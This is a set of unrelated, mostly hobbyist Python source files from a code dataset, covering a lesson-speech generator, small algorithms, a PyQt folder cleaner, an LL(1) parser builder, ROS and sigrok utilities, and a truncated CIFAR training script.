messages=conversation_history\n    )\n    message = \"\"\n\n    for choice in response.choices:\n        message += choice.message['content']\n\n    # Append the response to the conversation history\n    conversation_history.append({\"role\": \"assistant\", \"content\": message})\n    return message\n\ndef openjson(filename):\n    with open(\"json\\\\\"+filename,encoding='utf-8') as file:\n        return (json.load(file))\n    \ndef speech_generate(jsonfilename,conversation_history):\n\n    lesson_data=openjson(jsonfilename)\n\n    for section in lesson_data:\n        print(section['時間'])\n        print(f\"学習活動: {section['学習活動']}\")\n        print(f\"指導上の留意点: {section['指導上の留意点']}\")\n        評価の観点 = section['評価の観点'] if section['評価の観点'] is not None else \"なし\"\n        print(f\"評価の観点: {評価の観点}\")\n\n        teacher_speech = generate_text(\"学習活動:\"+section[\"学習活動\"]+\"指導上の留意点:\"+section[\"指導上の留意点\"],conversation_history)\n        section[\"教師の発話\"] = teacher_speech\n        print(\"教師の発話\"+section[\"教師の発話\"])\n        print(\"\\n\") # Insert a blank line between sections\n\n    # Save as a new JSON file\n    with open('json\\\\updated_lesson_plan.json', 'w', encoding='utf-8') as file:\n        json.dump(lesson_data, file, ensure_ascii=False, indent=2) \n    print(\"処理終了です\")\n\n\ndef main():\n    # Initialize the list that stores the conversation history\n    conversation_history = []\n    # Add the system instruction\n    conversation_history.append({\"role\": \"system\", \"content\": operating})\n\n    speech_generate(\"honji_tenkai.json\",conversation_history)\n\nif __name__ == \"__main__\":\n\n    main()","repo_name":"moriten0318/AITeacher_python","sub_path":"JSONtoLesson.py","file_name":"JSONtoLesson.py","file_ext":"py","file_size_in_byte":4415,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37311508789","text":"arr = [5, 2, 3, 7, 4, 1]\nkey = int(input(\"검색할 값을 입력하세요:\"))\n\narr.append(key) # append the sentinel value\ni = 0\nwhile True:\n\tif arr[i] == key:\n\t\tbreak\n\ti += 1\nif i == len(arr)-1:\n\tprint(\"not found\")\nelse:\n\tprint(f\"검색값은 {i}에 있습니다.\")\n","repo_name":"PSLeon24/DataStructure-Algorithms","sub_path":"Sentinel.py","file_name":"Sentinel.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"27997362171","text":"import numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\n\nx = [\"FEBio\", \"SOniCS\", \"ACEFEM\"]\ny = [\"FEBio\", \"SOniCS\", \"ACEFEM\"]\n\nharvest = np.array([[0.0, 10.92, 14.19], \n                    [10.92, 0.0, 3.33], \n                    [14.19, 3.33, 0.0]])\n\n# FEBio x ACEGen: 14.19 %\n# FEBio x SOniCS: 10.92 %\n# ACEGen x SOniCS: 3.33 %\n\nfig, ax = plt.subplots()\nim = ax.imshow(harvest, cmap='Blues')\n\n# Show all ticks and label them with the respective list entries\nax.set_xticks(np.arange(len(x)))\nax.set_yticks(np.arange(len(y)))\n\n# ... 
and label them with the respective list entries\nax.set_xticklabels(x)\nax.set_yticklabels(y)\n\n# Rotate the tick labels and set their alignment.\nplt.setp(ax.get_xticklabels(), rotation=45, ha=\"right\",\n         rotation_mode=\"anchor\")\n\n# Loop over data dimensions and create text annotations.\nfor i in range(len(x)):\n    for j in range(len(y)):\n        text = ax.text(j, i, harvest[i, j],\n                       ha=\"center\", va=\"center\", color=\"w\")\n\n#ax.set_title(\"ACEGen vs FEBio vs SOniCS for Mooney-Rivlin material with Q1 discretization\")\nfig.tight_layout()\nplt.show()","repo_name":"Sidaty1/PaperVisu","sub_path":"heatmap_sonics_acegen_febio.py","file_name":"heatmap_sonics_acegen_febio.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"18955492012","text":"#solution_python1_chapter05_function.py\r\n\r\ndef outer_function(operation, subtract_this):\r\n\t\"takes an operation and a number to subtract\"\r\n\tthing_to_subtract=subtract_this\r\n\tdef add_me(a, b):\r\n\t\t\"adds two numbers\"\r\n\t\treturn (a + b) \r\n\t\r\n\tdef mult_me(a, b):\r\n\t\t\"multiplies two numbers\"\r\n\t\treturn a * b \r\n\t\r\n\t#a dict of possibilities\r\n\top_dict={\"addition\": add_me,\r\n\t    \"multiplication\": mult_me}\r\n\t\r\n\r\n\tdef inner_function(a,b):\r\n\t\t\"inner-most function\"\r\n\t\tfunc=op_dict.get(operation, None)\r\n\t\tnonlocal thing_to_subtract\r\n\t\tfs= \"You asked me to perform {} on {} and {} then subtract {}. I got {}.\"\r\n\t\tif func:\r\n\t\t\tprint(fs.format(operation, a, b, subtract_this, func(a,b)-subtract_this))\r\n\t\telse:\r\n\t\t\tprint(\"The operation you provided {} is not yet supported\".format(operation))\r\n\r\n\treturn inner_function\t\r\n\r\n\r\nexecute_this_with_two_args=outer_function(\"addition\", 10)\r\nexecute_this_with_two_args(2,3)\r\n\r\n\r\n\r\n","repo_name":"pbarton666/PES_Python_examples_and_solutions","sub_path":"solution_python1_chapter05_function.py","file_name":"solution_python1_chapter05_function.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1689135213","text":"from PyQt5.QtWidgets import (QWidget, QSizePolicy, QVBoxLayout, QPushButton, QSplitter, QHBoxLayout,\n                             QFrame, QLabel,\n                             QTableWidget, QAbstractItemView, QAbstractScrollArea, QHeaderView,\n                             QFileDialog, QListView,\n                             QTreeView, QTableWidgetItem)\nfrom PyQt5.QtCore import Qt, QDir\nfrom assets import styles\nfrom ui.Widgets import Widgets\nfrom backie.Empty import Empty\n\n\nclass MainUI(QWidget):\n    \"\"\"\n    Components of Main UI displayed when app opens up\n    \"\"\"\n\n    def __init__(self, parent=None):\n        try:\n            super(MainUI, self).__init__(parent)\n            # self.setMinimumSize(800, 600)\n            self.selected_folders = []\n            self.folder_table_contents = []\n            self.empty_folders = []\n            self.empty = Empty()\n            self.widgets = Widgets()\n            self.setSizePolicy(QSizePolicy.Ignored, QSizePolicy.Ignored)\n            self._initialize_components()\n            self.setWindowTitle('Delete Empty')\n        except Exception as e:\n            print(e)\n\n    def _initialize_components(self):\n        layout = QVBoxLayout()\n        splitter = QSplitter(Qt.Horizontal)\n\n        left_frame = self._initialize_left_frame()\n        right_frame = self._initialize_right_frame()\n        splitter.addWidget(left_frame)\n        splitter.addWidget(right_frame)\n        layout.addWidget(splitter)\n        self.setLayout(layout)\n\n    def new_qframe(self):\n        frame = QFrame()\n        frame.setStyleSheet(styles.FRAME_PAGE_STYLE)\n        return frame\n\n    def 
_initialize_left_frame(self):\n frame = self.new_qframe()\n frame.setMaximumWidth(200)\n splitter = QSplitter(Qt.Vertical)\n left_top_frame = self._initialize_left_top_frame()\n left_bottom_frame = self._initialize_left_bottom_frame()\n splitter.addWidget(left_top_frame)\n splitter.addWidget(left_bottom_frame)\n layout = QVBoxLayout()\n\n layout.addWidget(splitter)\n frame.setLayout(layout)\n return frame\n\n def _initialize_right_frame(self):\n frame = self.new_qframe()\n layout = QVBoxLayout()\n splitter = QSplitter(Qt.Vertical)\n right_top_frame = self._initialize_right_top_frame()\n right_middle_frame = self._initialize_right_middle_frame()\n right_bottom_frame = self._initialize_right_bottom_frame()\n\n splitter.addWidget(right_top_frame)\n splitter.addWidget(right_middle_frame)\n splitter.addWidget(right_bottom_frame)\n layout.addWidget(splitter)\n frame.setLayout(layout)\n return frame\n\n def _initialize_left_top_frame(self):\n frame = self.new_qframe()\n frame.setMaximumHeight(50)\n layout = QHBoxLayout()\n layout.setAlignment(Qt.AlignCenter)\n select_folder_button = QPushButton(\"Select Folder\")\n select_folder_button.setStyleSheet(styles.DIALOG_BUTTON)\n select_folder_button.setMaximumWidth(160)\n select_folder_button.clicked.connect(self.select_button_clicked)\n\n layout.addWidget(select_folder_button)\n frame.setLayout(layout)\n return frame\n\n def _initialize_left_bottom_frame(self):\n frame = self.new_qframe()\n layout = QVBoxLayout()\n\n frame.setLayout(layout)\n return frame\n\n def _initialize_right_top_frame(self):\n frame = self.new_qframe()\n frame.setMaximumHeight(50)\n layout = QHBoxLayout()\n layout.setAlignment(Qt.AlignCenter)\n header = QLabel('Empty Folders')\n header.setStyleSheet(styles.LABEL_HEADER)\n layout.addWidget(header)\n frame.setLayout(layout)\n return frame\n\n def _initialize_right_middle_frame(self):\n frame = self.new_qframe()\n layout = QHBoxLayout()\n self._initialize_folder_table_view()\n\n layout.addWidget(self.folder_list_view)\n frame.setLayout(layout)\n return frame\n\n def _initialize_right_bottom_frame(self):\n frame = self.new_qframe()\n layout = QHBoxLayout()\n layout.setAlignment(Qt.AlignTop)\n layout.setSpacing(50)\n self.delete_all_button = QPushButton('Delete All')\n self.delete_selected_button = QPushButton('Delete Selected')\n self.delete_all_button.setMaximumWidth(160)\n self.delete_selected_button.setMaximumWidth(160)\n self.delete_selected_button.setEnabled(False)\n self.delete_all_button.setEnabled(False)\n self.delete_all_button.setStyleSheet(styles.DIALOG_BUTTON)\n self.delete_selected_button.setStyleSheet(styles.DIALOG_BUTTON)\n self.delete_all_button.clicked.connect(self.delete_all_button_clicked)\n\n layout.addWidget(self.delete_all_button)\n layout.addWidget(self.delete_selected_button)\n\n frame.setLayout(layout)\n\n return frame\n\n def _initialize_folder_table_view(self):\n self.folder_list_view = self._get_table_widget()\n self.folder_list_view.setColumnCount(4)\n self.folder_list_view.setHorizontalHeaderLabels(\n ['Folder Name', 'Path', 'Created time', 'Deleted time'])\n self.folder_list_view.setSelectionBehavior(QAbstractItemView.SelectRows)\n # self.folder_list_view.horizontalHeader().setSectionResizeMode(1, QHeaderView.ResizeToContents)\n self.folder_list_view.horizontalHeader().setSectionResizeMode(QHeaderView.Stretch)\n self.folder_list_view.itemSelectionChanged.connect(self.delete_select_button_toggle)\n\n def delete_select_button_toggle(self):\n self.selected_empty_folders = 
self.folder_list_view.selectedIndexes()\n if self.selected_empty_folders:\n self.delete_selected_button.setEnabled(True)\n print(dir(self.selected_empty_folders[0]))\n print(self.selected_empty_folders[0].row)\n print(self.selected_empty_folders[0].column)\n print(self.selected_empty_folders[0].child)\n print(self.selected_empty_folders[0].flags)\n print(self.selected_empty_folders[0].data)\n print(self.selected_empty_folders[0].internalId)\n print(self.selected_empty_folders[0].internalPointer)\n print(self.selected_empty_folders[0].model)\n print(self.selected_empty_folders[0].parent)\n print(self.selected_empty_folders[0].sibling)\n\n else:\n self.delete_selected_button.setEnabled(False)\n print(self.selected_empty_folders)\n\n def _get_table_widget(self):\n table_widget = QTableWidget()\n table_widget.setStyleSheet(styles.TABLE_WIDGET_STYLE)\n table_widget.verticalHeader().setVisible(False)\n table_widget.horizontalHeader().setDefaultAlignment(Qt.AlignCenter)\n table_widget.verticalScrollBar().setStyleSheet(styles.SCROLL_AREA)\n table_widget.horizontalHeader().setHighlightSections(False)\n table_widget.setEditTriggers(QAbstractItemView.NoEditTriggers)\n table_widget.horizontalHeader().setStretchLastSection(True)\n\n return table_widget\n\n def delete_all_button_clicked(self):\n print(self.folder_table_contents)\n if self.empty.delete_folders(self.empty_folders):\n self.widgets.get_message_box(\"Deleted Successfully\").exec()\n\n def delete_selected_button_clicked(self):\n pass\n\n def select_button_clicked(self):\n try:\n print('Folder')\n self._get_file_dialog()\n if self.selected_folders:\n print(self.selected_folders)\n self.folder_table_contents, self.empty_folders = self.empty.get_empty_folders_list(\n self.selected_folders)\n print(self.folder_table_contents)\n if self.folder_table_contents:\n self.delete_all_button.setEnabled(True)\n self.generate_folder_list_view()\n else:\n message_box = self.widgets.get_message_box(\"No Empty folders\")\n message_box.exec()\n except Exception as e:\n print(e)\n\n def generate_folder_list_view(self):\n self.folder_list_view.setRowCount(len(self.folder_table_contents))\n index = 0\n for folder in self.folder_table_contents:\n self.folder_list_view.setItem(index, 0, QTableWidgetItem(folder[0]))\n self.folder_list_view.setItem(index, 1, QTableWidgetItem(folder[1]))\n self.folder_list_view.setItem(index, 2, QTableWidgetItem(folder[2]))\n self.folder_list_view.setItem(index, 3, QTableWidgetItem(folder[3]))\n index += 1\n self.folder_list_view.horizontalHeader().setSectionResizeMode(0, QHeaderView.Interactive)\n self.folder_list_view.horizontalHeader().setSectionResizeMode(1, QHeaderView.Interactive)\n self.folder_list_view.horizontalHeader().setSectionResizeMode(2, QHeaderView.Interactive)\n self.folder_list_view.horizontalHeader().setSectionResizeMode(3, QHeaderView.Interactive)\n\n def _get_file_dialog(self):\n self.file_dialog = QFileDialog()\n options = QFileDialog.Options()\n options |= QFileDialog.ShowDirsOnly\n options |= QFileDialog.DontUseNativeDialog\n self.file_dialog.setFileMode(QFileDialog.DirectoryOnly)\n self.file_dialog.setOptions(options)\n self.file_dialog.setWindowTitle(\"Select Folder\")\n self.file_dialog.setDirectory(QDir.home())\n self.file_dialog.setWindowFlag(Qt.WindowContextHelpButtonHint, False)\n self.file_dialog.findChildren(QListView)[0].setSelectionMode(\n QAbstractItemView.ExtendedSelection)\n self.file_dialog.findChildren(QTreeView)[0].setSelectionMode(\n QAbstractItemView.ExtendedSelection)\n # 
self.file_dialog.setFixedSize(800, 600)\n        if self.file_dialog.exec():\n            self.selected_folders = self.file_dialog.selectedFiles()\n","repo_name":"nambi0915/empty","sub_path":"ui/MainUI.py","file_name":"MainUI.py","file_ext":"py","file_size_in_byte":9893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19115861737","text":"from .cube import *\nfrom display import *\n\ndef autoscroll(layer_generator, direction = Direction.BACK):\n    c = Cube()\n    while True:\n        for val in layer_generator:\n            if type(val) is bool:\n                # A boolean means clear the cube and finish before continuing.\n                for i in range(c.size):\n                    scroll_back(c, direction)\n                    yield c.copy()\n                yield True\n                continue\n            scroll_back(c, direction, new_layer = val)\n            yield c.copy()\n\ndef scroll_back(cube, direction, new_layer = Colour.BLACK):\n    for i in range(cube.size - 1):\n        cube.fill_layer(direction, i, cube.get_layer(direction, i + 1))\n    cube.fill_layer(direction, cube.size - 1, new_layer)\n\n","repo_name":"abryant/LED-Cube","sub_path":"visuals/autoscroll.py","file_name":"autoscroll.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"472730820","text":"import sigrokdecode as srd\n\n# sigrok-cli --driver saleae-logic16 --config samplerate=500k --channels 14=RX,3 --continuous\n# -P uart:rx=RX,uart_logger:file_name=1.bin\n# -P uart:rx=3,uart_logger:file_name=2.bin\n# -A uart_logger\n\n\nclass Decoder(srd.Decoder):\n    api_version = 3\n    id = 'uart_logger'\n    name = 'uart_logger'\n    longname = 'uart_logger'\n    desc = 'uart_logger'\n    license = 'lgpl'\n    inputs = ['uart']\n    outputs = []\n    tags = ['Embedded/industrial']\n    options = (\n        {'id': 'file_name', 'desc': 'binary file to save data from uart', 'default': ''},\n    )\n    annotations = (\n        ('b', 'byte'),\n        ('n', 'num'),\n\n    )\n    annotation_rows = (\n        ('byte_output', 'ReadBytesOutput', (0, )),\n        ('num_output', 'ReadNumOutput', (1, )),\n    )\n\n    def __init__(self):\n        self.filename = ''\n        self.count = 0\n        self.out_ann = None\n        self.file = None\n\n    def start(self):\n        self.out_ann = self.register(srd.OUTPUT_ANN)\n        self.count = 0\n        self.filename = self.options['file_name']\n        if self.filename is None or len(self.filename) <= 0:\n            raise Exception('specify file_name option')\n        self.file = open(self.filename, 'wb', buffering=0)\n\n    def put_char(self, bit):\n        self.put(self.count, self.count, self.out_ann, [0, [bit]])\n\n    def put_num(self, num):\n        self.put(self.count, self.count, self.out_ann, [1, [str(num)]])\n\n    def decode(self, ss, es, data):\n        self.count += 1\n        ptype, rxtx, pdata = data\n        if ptype != 'DATA':\n            return\n        num = pdata[0]\n        self.put_num(num)\n        self.put_char(chr(num))\n        try:\n            self.file.write(bytes([num]))\n        except Exception as e:\n            print(e)\n","repo_name":"vchernokulsky/RPiDevLogger","sub_path":"decoders/uart_logger/pd.py","file_name":"pd.py","file_ext":"py","file_size_in_byte":1766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70920762668","text":"import os\nimport sys\nsys.path.append(os.path.abspath(os.path.dirname(__file__)+'/'+'..'))\nfrom database.pymysql_comm import UsingMysql\nimport ast\n\n#----------------------------\n# Add received message list\n# Add a message list for a given account\ndef fetch_mes_by_filter(cursor, id):\n    sql = f'select message from user where id = {id}' \n    cursor.execute(sql)\n    data_str = cursor.fetchall()[0]['message']\n    data_dict = ast.literal_eval(data_str)\n    # print('-- query user message list: 
%s'%data_dict)\n    return data_dict\n# look up\ndef get_mes_by_id(id):\n    with UsingMysql(log_time=False) as um:\n        data_dict = fetch_mes_by_filter(um.cursor, id)\n        # process\n        return data_dict\n\ndef up_mes_by_id(cursor, id, con):\n    sql = f'''update user set message = \"{con}\" where id = {id}'''\n    print(sql)\n    cursor.execute(sql)\n\ndef update_mes_by_id(id, messages):\n    with UsingMysql(log_time=False) as um:\n        up_mes_by_id(um.cursor, id, messages)\n\n# update_mes_by_id('234', \"{'cheng': '今天天气怎么样?'}\"), \n# print(type(get_mes_by_id(123)))","repo_name":"xuchengcheng926/chatting","sub_path":"server/interface/mysql_message.py","file_name":"mysql_message.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"44844503928","text":"import rospy\nimport struct\n\nfrom sensor_msgs import point_cloud2\nfrom sensor_msgs.msg import PointCloud2, PointField\nfrom std_msgs.msg import Header\n\n\nclass ColorGenerator:\n\n    def __init__(self):\n        self.index = 0\n        self.color_list = []\n        self.generateList()\n\n    def generateList(self):\n        rgb_list = [\n            [255, 51, 153],\n            [153, 51, 255],\n            [51, 153, 255],\n            [51, 255, 153],\n            [153, 255, 51],\n            [255, 153, 51],\n        ]\n        for rgb in rgb_list:\n            self.color_list.append(struct.unpack('I', struct.pack('BBBB', rgb[2], rgb[1], rgb[0], 0))[0])\n\n    def getColor(self):\n        c = self.color_list[self.index]\n        self.index = (self.index + 1) % len(self.color_list)\n        return c\n\n\ndef ShapelyPointToROSPoint(p, color=None):\n    return [p.x, p.y, p.z, color]\n\n\ndef MultiPointToPoints(mp, color=None):\n    return [ShapelyPointToROSPoint(p, color) for p in mp]\n\n\ndef ClustersToPointCloud2(clusters):\n    color_generator = ColorGenerator()\n\n    points = []\n    for c in clusters:\n        points.extend(MultiPointToPoints(c.getPoints(), color_generator.getColor()))\n\n    fields = [PointField('x', 0, PointField.FLOAT32, 1),\n              PointField('y', 4, PointField.FLOAT32, 1),\n              PointField('z', 8, PointField.FLOAT32, 1),\n              PointField('rgb', 12, PointField.UINT32, 1),\n              # PointField('rgba', 12, PointField.UINT32, 1),\n              ]\n\n    header = Header()\n    header.frame_id = \"map\"\n    header.stamp = rospy.Time.now()\n    pc2 = point_cloud2.create_cloud(header, fields, points)\n\n    return pc2\n","repo_name":"908941087/mmwave_radar_indoor_false","sub_path":"ti_ws/src/py_interface/scripts/EnvClassifier/ShapeOperator/ClustersToPointCloud2Converter.py","file_name":"ClustersToPointCloud2Converter.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"4244893609","text":"import sys\n\nGrammer = dict()  # grammar\nFIRST = dict()  # FIRST sets\nFOLLOW = dict()  # FOLLOW sets\nTable = dict()  # parse table\nVT = set()  # terminal symbols\nleftRucrFlag = False\n\ndef get_VT():\n    for key in Grammer.keys():\n        for item in Grammer[key]:\n            for ch in item:\n                if not ch.isupper():\n                    VT.add(ch)\n    VT.add('#')\n\ndef judge_leftRucr(key,A):\n    global leftRucrFlag\n    if leftRucrFlag is True:\n        return\n    for item in Grammer[key]:\n        if item[0].isupper() and item[0]!=A:\n            judge_leftRucr(item[0],A)\n        elif item[0]==A:\n            leftRucrFlag = True\n            return\n\n\n\ndef judge_LL1():\n    # eliminate left recursion (to be done)\n    # check FIRST(αi) & FIRST(αj) == empty; for A->α with α=>'ε', FIRST(A) & FOLLOW(A) == empty\n    for key in Grammer.keys():\n        for item1 in Grammer[key]:\n            for item2 in Grammer[key]:\n                if item1 != item2 and len(FIRST[item1] & FIRST[item2]) > 0:\n                    return False\n            if 'ε' in FIRST[item1]:\n                if len(FIRST[key] & FOLLOW[key]) > 0:\n                    return False\n    return True\n\n\ndef 
get_first():\n    FIRST_SIZE = dict()\n    # compute the FIRST set for every grammar symbol\n    # initialize, and compute FIRST sets for the terminals\n    for k in Grammer.keys():\n        FIRST[k] = set()\n        FIRST_SIZE[k] = 0\n    for v in VT:\n        FIRST[v] = set(v)\n        FIRST_SIZE[v] = 1\n    # compute FIRST sets for the nonterminals; stop looping once the set sizes no longer grow\n    done = False\n    while not done:\n        done = True\n        for k in Grammer.keys():\n            for item in Grammer[k]:\n                # productions of the form X->a...\n                if not item[0].isupper():\n                    FIRST[k].add(item[0])\n                # productions of the form X->Y1Y2Y3...\n                elif item[0].isupper():\n                    FIRST[k] = FIRST[k].union(FIRST[item[0]] - set('ε'))\n                    for index, ch in zip(range(len(item)), item):\n                        if 'ε' in FIRST[ch] and index + 1 < len(item):\n                            FIRST[k] = FIRST[k].union(FIRST[item[index + 1]] - set('ε'))\n                        else:\n                            break\n                    # all of Y1,Y2,Y3... derive ε, so add ε to FIRST(X)\n                    for ch in item:\n                        if 'ε' not in FIRST[ch]:\n                            break\n                    else:\n                        FIRST[k].add('ε')\n                # check whether the FIRST set grew\n                if len(FIRST[k]) != FIRST_SIZE[k]:\n                    done = False\n                    FIRST_SIZE[k] = len(FIRST[k])\n    # compute FIRST sets for the alternatives (which may be symbol strings)\n    for k in Grammer.keys():\n        for item in Grammer[k]:\n            get_strFirst(item)\n    FIRST['ε'] = set('ε')\n\n\n# Once the FIRST sets of single symbols are known, this computes FIRST for an arbitrary symbol string X1X2X3..., the same way as FIRST(X) for X->Y1Y2Y3...\ndef get_strFirst(item):\n    if len(item) > 1:\n        FIRST[item] = FIRST[item[0]] - set('ε')\n        for index, ch in zip(range(len(item)), item):\n            if 'ε' in FIRST[ch] and index + 1 < len(item):\n                FIRST[item] = FIRST[item].union(FIRST[item[index + 1]] - set('ε'))\n            else:\n                break\n        for ch in item:\n            if 'ε' not in FIRST[ch]:\n                break\n        else:\n            FIRST[item].add('ε')\n\n\ndef get_follow():\n    FOLLOW_SIZE = dict()\n    for k in Grammer.keys():\n        FOLLOW[k] = set()\n        FOLLOW_SIZE[k] = 0\n    FOLLOW['E'].add('#')\n    done = False\n    while not done:\n        done = True\n        for k in Grammer.keys():\n            for item in Grammer[k]:\n                for index, ch in zip(range(len(item)), item):\n                    if ch.isupper():\n                        if index + 1 < len(item):\n                            get_strFirst(item[index + 1:])\n                            # A->αBβ\n                            FOLLOW[ch] = FOLLOW[ch].union(FIRST[item[index + 1:]] - set('ε'))\n                        # A->αB, or A->αBβ with β=>ε\n                        if index == len(item) - 1 or 'ε' in FIRST[item[index + 1:]]:\n                            FOLLOW[ch] = FOLLOW[ch].union(FOLLOW[k])\n                        if len(FOLLOW[ch]) != FOLLOW_SIZE[ch]:\n                            FOLLOW_SIZE[ch] = len(FOLLOW[ch])\n                            done = False\n\n\ndef get_Table():\n    for key in Grammer.keys():\n        Table[key] = dict()\n        for v in VT - set('ε'):\n            Table[key][v] = str()\n    for key in Grammer.keys():\n        for item in Grammer[key]:\n            # when the terminal is in FIRST(alternative)\n            for v in FIRST[item]:\n                if v != 'ε':\n                    Table[key][v] = key + \"->\" + item\n            # when FIRST(alternative) contains ε, consult the FOLLOW set\n            if 'ε' in FIRST[item]:\n                for v in FOLLOW[key]:\n                    Table[key][v] = key + \"->\" + item\n    # mark undefined Table[key][v] entries with an error flag\n    for key in Grammer.keys():\n        for v in VT - set('ε'):\n            if len(Table[key][v]) == 0:\n                Table[key][v] = \"error\"\n","repo_name":"zhibin-huang/compiler-labs","sub_path":"LL1/LL1.py","file_name":"LL1.py","file_ext":"py","file_size_in_byte":5201,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"22988517708","text":"import lvgl as lv\nfrom constants import Constants\nfrom gui.app import App\nfrom micropython import const\nfrom lv_colors import lv_colors\nfrom gui.icon import Icon\ntry:\n    import ulogging as logging\nexcept:\n    import logging\n    \nclass Setup():\n    \n    def __init__(self,mainbar):\n        self.log = logging.getLogger(\"Setup\")\n        self.log.setLevel(logging.DEBUG)\n        self.setup_icon_data = [None]*Constants.MAX_SETUP_ICON\n        self.setup_icon_dsc = [None]*Constants.MAX_SETUP_ICON \n        self.mainbar = mainbar\n    \n    def setup_register(self,setup_name,icon_filename,event_cb):\n        self.setup_tile = self.mainbar.gui.app_tile\n        self.log.debug(\"register \" 
+ setup_name + \" with icon filename \" + icon_filename)\n setup = self.setup_tile.get_free_app_icon()\n if setup == None:\n return\n else:\n self.log.debug(\"Icon successfully registered\")\n \n setup.active = True # reserve the icon\n # setup label\n setup.label.set_text(setup_name)\n \n setup.label.align(setup.cont, lv.ALIGN.OUT_BOTTOM_MID, 0, 0 )\n setup.label.set_align(lv.label.ALIGN.CENTER );\n setup.cont.set_hidden(False)\n setup.label.set_hidden(False)\n #\n # setup icon and set event callback\n # create the img buttons allowing to start the apps\n #\n setup_style = lv.style_t()\n setup_style.copy(self.mainbar.get_style())\n #\n # create the imgbtn\n #\n setup.icon_img = lv.imgbtn(app.cont,None)\n \n (setup.icon_img_data,setup.icon_img_dsc) = self.get_setup_image(icon_filename)\n setup.icon_img.set_src(lv.btn.STATE.RELEASED,setup.icon_img_dsc)\n setup.icon_img.set_src(lv.btn.STATE.PRESSED,setup.icon_img_dsc)\n setup.icon_img.set_src(lv.btn.STATE.CHECKED_RELEASED,setup.icon_img_dsc)\n setup.icon_img.set_src(lv.btn.STATE.CHECKED_PRESSED,setup.icon_img_dsc)\n setup.icon_img.reset_style_list(lv.obj.PART.MAIN)\n setup.icon_img.align(setup.cont, lv.ALIGN.IN_TOP_LEFT, 0, 0 )\n setup.icon_img.set_event_cb(event_cb)\n self.log.debug(\"imgbtn position: %d,%d\"%(setup.x,setup.y)) \n self.mainbar.add_slide_element( setup.icon_img )\n\n # setup the indicator\n setup.indicator = lv.img(setup.cont,None)\n setup.indicator.align(setup.cont, lv.ALIGN.IN_TOP_LEFT, 0, 0 )\n setup.indicator.set_hidden(True)\n \n lv.obj.invalidate( lv.scr_act() )\n return setup\n\n def get_setup_image(self,filename):\n\n try:\n sdl_filename = 'images/' + filename + \"_argb8888.bin\"\n self.log.debug('sdl filename: ' + sdl_filename)\n with open(sdl_filename,'rb') as f:\n setup_icon_data = f.read()\n self.log.debug(sdl_filename + \" successfully read\")\n except:\n twatch_filename = 'images/' + filename + \"_argb565.bin\"\n self.log.debug('t-watch filename: ' + twatch_filename)\n try:\n with open(twatch_filename,'rb') as f:\n setup_icon_data = f.read()\n self.log.debug(twatch_filename + \" successfully read\")\n \n except:\n self.log.error(\"Could not find image file: \" + filename) \n\n setup_icon_dsc = lv.img_dsc_t(\n {\n \"header\": {\"always_zero\": 0, \"w\": 64, \"h\": 64, \"cf\": lv.img.CF.TRUE_COLOR_ALPHA},\n \"data\": setup_icon_data,\n \"data_size\": len(setup_icon_data),\n }\n )\n return (setup_icon_data,setup_icon_dsc) \n","repo_name":"uraich/twatch2020_firmware","sub_path":"src/gui/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":3659,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"34571133000","text":"\"\"\"\nCLI for normalization\n\"\"\"\n\nimport csv\n\nimport click\n\nfrom normalize_ids import (MODEL_FIELDNAMES,\n normalize_bpro,\n normalize_chadwick,\n normalize_crunchtime,\n normalize_sfbb)\n\n\nTRANSLATORS = {\n 'bpro': normalize_bpro,\n 'chadwick': normalize_chadwick,\n 'crunchtime': normalize_crunchtime,\n 'sfbb': normalize_sfbb,\n}\n\n@click.command('normalize')\n@click.option('-s', 'system', required=True,\n type=click.Choice(TRANSLATORS.keys()))\n@click.option('-i', 'input_path', required=True,\n type=click.Path(exists=True, dir_okay=False))\n@click.option('-o', 'output_fp', type=click.File('w'), required=True)\ndef normalize_id_registry(system, input_path, output_fp):\n \"\"\"Normalizes a given ID registry\n \"\"\"\n\n # watch encoding from crunchtime :/\n encoding = 'latin-1' if system in ('crunchtime', 'bpro') 
else 'utf-8'\n\n    reader = csv.DictReader(open(input_path, encoding=encoding))\n    writer = csv.DictWriter(output_fp, MODEL_FIELDNAMES)\n    writer.writeheader()\n\n    translator_fn = TRANSLATORS[system]\n\n    for row in reader:\n        model = translator_fn(row)\n        writer.writerow(dict(model))\n\n    click.echo(f'Wrote to {output_fp.name}')\n\n\nif __name__ == '__main__':\n    normalize_id_registry() # pylint: disable=no-value-for-parameter\n","repo_name":"mattdennewitz/baseball-normalize-player-ids","sub_path":"bin/bid_normalize_register.py","file_name":"bid_normalize_register.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"24256196254","text":"import numpy as np\nimport os\nimport random\nimport datetime\n\nfrom models.cnn import ConvNet\nfrom models.cnn_dropout import ConvNetDropout\nfrom trainer.trainer import ModelTrainer\nfrom data_loader.load_cifar import CifarDataLoader\nfrom config.config import Config\n\n\nSAVE_DIR = os.path.join(os.getcwd(),'saved_models')\n\nconfig_default = {\n    'batch_size' : 32,\n    'num_classes' : 10,\n    'epochs' : 75,\n    'input_shape' : (32, 32, 3),\n    'optimizer' : 